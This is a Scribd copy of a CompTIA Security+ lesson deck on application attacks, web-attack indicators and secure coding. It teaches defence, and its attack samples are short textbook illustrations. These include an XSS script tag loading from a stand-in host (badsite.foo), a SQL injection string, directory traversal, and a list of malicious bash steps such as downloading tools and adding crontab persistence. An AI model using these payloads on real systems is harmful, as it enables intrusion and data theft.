Scribd
Upload
18 views33 pages

Chapter 14

Uploaded by

Abhi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
18 views33 pages

Chapter 14

Uploaded by

Abhi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 33

Lesson 14

Summarizing Secure Application Concepts


Application Attacks
• Attacks that target vulnerabilities in application code
(An application vulnerability is a design flaw that can cause the application security
system to be circumvented or that will cause the application to crash.)
• Privilege escalation
• The purpose of most application attacks is to allow the threat actor to run his or her own code
on the system. This is referred to as arbitrary code execution. Where the code is transmitted
from one machine to another, it can be referred to as remote code execution. The code would
be designed to install some sort of backdoor or to disable the system in some way.
• Get privileges from target vulnerable process to run arbitrary code
• Vertical and horizontal privilege escalation
• Vertical privilege escalation (or elevation) is where a user or application can access
functionality or data that should not be available to them
• Horizontal privilege escalation is where a user accesses functionality or data that is
intended for another user

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 2
Overflow Vulnerabilities
• Buffer overflow
• Buffer is memory allocated to application
• The threat actor submits input that is too large to be stored in a variable assigned by the application.
• To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the
buffer. One of the most common vulnerabilities is a stack overflow.
• Integer overflow
• Cause application to calculate values that are out-of-bounds
• Could use to cause crash or use in buffer overflow attack
• (An integer overflow attack causes the target software to calculate a value that exceeds these
bounds. This may cause a positive number to become negative (changing a bank debit to a credit)

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 3
Memory Leaks and Resource Exhaustion

• Memory leaks
• Process allocates memory locations, but never releases them
• Can cause host to run out of memory
• Could be faulty code or could be malicious

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 4
DLL Injection

• Dynamic Link Library (DLL) implements some function that multiple


processes can use
• DLL injection is a vulnerability in the way the operating system allows one
process to attach to another. This functionality can be abused by malware
to force a legitimate process to load a malicious link library.
• A process that has been compromised by DLL injection might open unexpected network
connections, or interact with files and the registry suspiciously.
• Refactoring might allow code obfuscation to elude anti-virus- Refactoring
means that the A-V software may no longer identify the malware by its
signature.

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 5
Pass the Hash Attack
Attackers can extend their lateral movement if
they are able to compromise host credentials.
One common credential exploit technique for
lateral movement is called pass the hash (PtH)
• Malware executes another process
on a remote host
• Attacker can just pass hash without
having to crack it
• Remote host will accept hash as
credential
• Detection through security log
events
Images © 123rf.com.

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org
Topic 14B
Analyze Indicators of Web Application Attacks

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 7
A web application exposes many interfaces to public networks.

Attackers can exploit vulnerabilities in server software and in client


browser security to perform injection and session hijacking attacks that
compromise data confidentiality and integrity.
Uniform Resource Locator Analysis
• A URL can encode some action or data
to submit to the server host. This is a
common vector for malicious activity.
• HTTP methods
• TCP connections
• GET, POST, PUT
• POST or PUT
• URL (query parameters)
• HTTP response codes
GET-- used to retrieve a resource
• POST—send data to the server for processing by
the requested resource. • PUT—create or replace
the resource. DELETE can be used to remove the
resource. • HEAD—retrieve the headers for a
resource only (not the body).

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 9
Application Programming Interface Attacks

Some other common attacks against APIs target the following weaknesses and
vulnerabilities:
• Ineffective secrets management, allowing threat actors to discover an API key
and perform any action authorized to that key.
• Lack of input validation, allowing the threat actor to insert arbitrary
parameters into API methods and queries. This is often referred to as allowing
unsanitized input.
• Error messages revealing clues to a potential adversary. For example, an authentication
error should not reveal whether a valid username has been rejected because of an invalid password. The error should
simply indicate an authentication failure.
• Denial of service (DoS) by bombarding the API with spurious calls.

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 10
Replay Attacks

• A replay attack is a form of network attack in which valid data transmission is


maliciously or fraudulently repeated or delayed.
• A replay attack works by sniffing or guessing the token value and then
submitting it to re-establish the session illegitimately
Session Hijacking
• Client-side/cross-site (CSRF/XSRF)
request forgery
• Passes a URL to another site where the
user has an authenticated session
Session hijacking most often means
replaying a cookie in some way. Attackers
can sniff network traffic to obtain session
cookies sent over an unsecured network

To counter cookie hijacking, you can


encrypt cookies during transmission,
delete cookies from the client's browser
cache when the client terminates the
session, and design your web app to
deliver a new cookie with each new session
Images © 123rf.com.
between the app and the client's browser.

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 12
Clickjacking

• Add invisible layer to intercept/redirect click events


• Clickjacking is an attack where what the user sees and trusts as a web
application with some sort of login page or form contains a malicious layer
or invisible iFrame that allows an attacker to intercept or redirect user
input.

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 13
Cross-Site Scripting (XSS)
Check out this amazing <a
• Attacker injects code in trusted site href="https://trusted.foo">website</a><script
that will be executed in client src="https://badsite.foo/hook.js"></script>.
browser
• A client-side or cross-site request
forgery (CSRF or XSRF) can exploit
applications that use cookies to
authenticate users and track
sessions. https://trusted.foo/messages#user=James
The attacker must convince the victim to start a %3Cscript%20src%3D%22https%3A%2F
session with the target site. The attacker must %2Fbadsite.foo%2Fhook.js%22%3E%3C
then pass an HTTP request to the victim's %2Fscript%3E
browser that spoofs an action on the target site

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 14
Structured Query Language Injection Attacks

• Injection-type attacks
• Structured Query Language (SQL)
SELECT * FROM tbl_user WHERE
statements username = '' or 1=1--#
• SELECT, INSERT, DELETE, UPDATE, WHERE
• SQL injection
• Pass SQL statements to the web application
via user input or URL
• Show or insert database records

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 15
Directory Traversal

• Directory traversal
• Obtain access to files outside web site root directory

The threat actor submits a request for a file outside the web server's root directory
by submitting a path to navigate to the parent directory (../). This attack can succeed
if the input is not filtered properly and access permissions on the file are the same
as those on the web server directory.

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 16
Topic 14C
Summarize Secure Coding Practices

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 17
Static Code Analysis

• Static/source code analysis


• Submit code for analysis by automated software
• Manual code review
• Human analysis of source code

Some of the most important coding practices are input validation, output encoding,
and error handling.
Normalization means that a string is stripped of illegal characters or substrings and
converted to the accepted character set. Output encoding means that the string is
re-encoded safely for the context in which it is being used.

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 18
Dynamic Code Analysis

• Run application in a staging


environment for testing

• "stress testing"

Screenshot Burp Suite portswigger.net/burp.


Topic 14D
Implement Secure Script Environments

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 20
Scripting

• Automation of activity through programs and scripts


• Basic elements of a script
• Parameters
• Branching and looping statements
• Validation and error handlers
• testing

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 21
Python Script Environment

• Basic syntax elements


• Case sensitivity and indentation
• Variables
• Assignment and typing def fullname(name,surname):
return name + " " + surname
• Functions #This ends the function definition
• Declaring functions #The next line calls the function
• Logic and looping statements greeting = 'Hello ' + fullname('World', '')
• Comparison operators print(greeting)
• Control blocks
• Modules
• Libraries of functions
• Execution
• Within interpreter or compiled
Execution Control

• Prevent use of unauthorized code


• Allow lists and block lists
• Allow list control means that nothing can run if it is not on the approved list
• Block list control means that anything not on the prohibited list can run

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 23
Malicious Code Indicators
• Detection through monitoring platforms or host/process behavior
analysis. The main types of malicious activity:
• Shellcode - Creates a process or injects a DLL
• Credential dumping—the malware might try to access the credentials file
• Lateral movement/insider attack
• Persistence – restarting backdoor

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 24
Bash and Python Malicious Indicators
• (Bash)- Bourne Again Shell - Batch scripting for Linux command-line
A malicious script running on a Linux host might attempt the following:
• 1. Use commands such as whoami and ifconfig/ip/route to establish the local context.
• 2. Download tools, possibly using wget or curl.
• 3. Add crontab entries to enable persistence.
• 4. Add a user to sudo and enable remote access via SSH.
• 5. Change firewall rules using iptables.
• 6. Use tools such as Nmap to scan for other hosts.
• Malicious indicators
• Reconnaissance-type activity
• Download tools
• Account/firewall configuration changes

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 25
Visual Basic for Applications (VBA)

• VBA stands for Visual Basic for Applications, an event-driven


programming language from Microsoft. It is now predominantly
used with Microsoft Office applications such as MSExcel, MS-
Word and MS-Access

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 26
Man-in-the-Browser Attack
• Compromise browser
• Inspect session data
• Change browser settings
• Perform redirection
• Perform code injection
• Malicious plug-in/script/DLL

Screenshot: Browser Exploitation Framework (beefproject.com).

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 27
Topic 14E
Summarize Deployment and Automation Concepts

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 28
Application Development, Deployment, and Automation

• DevSecOps and requirements for greater automation


• Completion of tasks without human intervention
• Automation facilitates better scalability and elasticity
• Scalability means that the costs involved in supplying the service to more users
are linear
• Elasticity refers to the system's ability to handle changes on demand in real time

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 29
Secure Application Development Environments

• Software development life cycle


(SDLC)
• Waterfall and Agile
• Quality assurance (QA)
• Development environments
• Preserving environment
integrity
• Sandboxing
• Secure baseline
• Integrity measurement

Images © 123rf.com.
Provisioning, Deprovisioning, and Version Control

• Provisioning is the process of deploying an application to the target


environment
• Installer/setup package
• Instance (VM with OS and application)
• Deprovisioning is the process of removing an application from packages or
instances
• Version control
• Customer version ID
• Developer build ID
• Source code version control
• Code commits and backups

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 31
Automation/Scripting Release Paradigms
Images © 123rf.com.

• Waterfall versus Agile SDLCs


• Continuous integration
• Commit updates often
• Reduce commit conflicts
• Continuous delivery
• Push updates to staging
infrastructure
• Continuous deployment
• Push updated code to production
• Continuous monitoring and
automated courses of action
• Continuous validation
Software Diversity

• Runtime environment
• Compiled code
• Interpreted code
• Software diversity as obfuscation
• Security by diversity
• Avoid monocultures to make attacks harder to develop

CompTIA Security+ Lesson 14 | Copyright © 2020 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org 33

You might also like